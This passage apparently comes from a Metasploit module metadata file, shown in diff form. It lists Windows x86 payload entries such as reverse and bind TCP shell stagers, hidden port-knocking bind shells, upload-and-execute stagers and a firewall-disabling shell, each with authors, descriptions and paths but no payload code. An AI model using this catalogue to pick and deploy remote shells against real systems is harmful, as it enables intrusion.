"Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/shell/bind_tcp_uuid": { - "name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/shell/find_tag": { - "name": "Windows Command Shell, Find Tag Ordinal Stager", - "fullname": "payload/windows/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/shell/reverse_ipv6_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/shell/reverse_nonx_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": 
null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/shell/reverse_ord_tcp": { - "name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/shell/reverse_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager", - "fullname": "payload/windows/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/shell/reverse_tcp_allports": { - "name": "Windows Command Shell, Reverse All-Port TCP Stager", - "fullname": "payload/windows/shell/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/shell/reverse_tcp_dns": { - "name": "Windows Command Shell, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/shell/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/shell/reverse_tcp_rc4": { - "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/shell/reverse_tcp_rc4_dns": { - "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/shell/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell 
(staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/shell/reverse_tcp_uuid": { - "name": "Windows Command Shell, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/shell/reverse_udp": { - "name": "Windows Command Shell, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/shell/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "RageLtMan " - ], - 
"description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/shell_bind_tcp": { - "name": "Windows Command Shell, Bind TCP Inline", - "fullname": "payload/windows/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_bind_tcp_xpfw": { - "name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline", - "fullname": "payload/windows/shell_bind_tcp_xpfw", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Lin0xx " - ], - "description": "Disable the Windows ICF, then listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, 
- "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", - "is_install_path": true, - "ref_name": "windows/shell_bind_tcp_xpfw", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_hidden_bind_tcp": { - "name": "Windows Command Shell, Hidden Bind TCP Inline", - "fullname": "payload/windows/shell_hidden_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sd", - "Borja Merino " - ], - "description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell_hidden_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_reverse_tcp": { - "name": "Windows Command Shell, Reverse TCP Inline", - "fullname": "payload/windows/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - 
"platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/speak_pwned": { - "name": "Windows Speech API - Say \"You Got Pwned!\"", - "fullname": "payload/windows/speak_pwned", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Berend-Jan \"SkyLined\" Wever " - ], - "description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/speak_pwned.rb", - "is_install_path": true, - "ref_name": "windows/speak_pwned", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/upexec/bind_hidden_ipknock_tcp": { - "name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/upexec/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). 
After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/upexec/bind_hidden_tcp": { - "name": "Windows Upload/Execute, Hidden Bind TCP Stager", - "fullname": "payload/windows/upexec/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": 
"windows/bind_hidden_tcp" - }, - "payload_windows/upexec/bind_ipv6_tcp": { - "name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/upexec/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/upexec/bind_ipv6_tcp_uuid": { - "name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/upexec/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, 
- "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/upexec/bind_named_pipe": { - "name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/upexec/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "UserExistsError" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/upexec/bind_nonx_tcp": { - "name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/upexec/bind_tcp": { - "name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/upexec/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/upexec/bind_tcp_rc4": { - "name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/upexec/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": 
false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/upexec/bind_tcp_uuid": { - "name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/upexec/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/upexec/find_tag": { - "name": "Windows Upload/Execute, Find Tag Ordinal Stager", - "fullname": "payload/windows/upexec/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/upexec/find_tag", - "check": false, - "post_auth": false, 
- "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/upexec/reverse_ipv6_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/upexec/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/upexec/reverse_nonx_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_nonx_tcp", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/upexec/reverse_ord_tcp": { - "name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "spoonm " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/upexec/reverse_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager", - "fullname": "payload/windows/upexec/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": 
"windows/upexec/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/upexec/reverse_tcp_allports": { - "name": "Windows Upload/Execute, Reverse All-Port TCP Stager", - "fullname": "payload/windows/upexec/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": 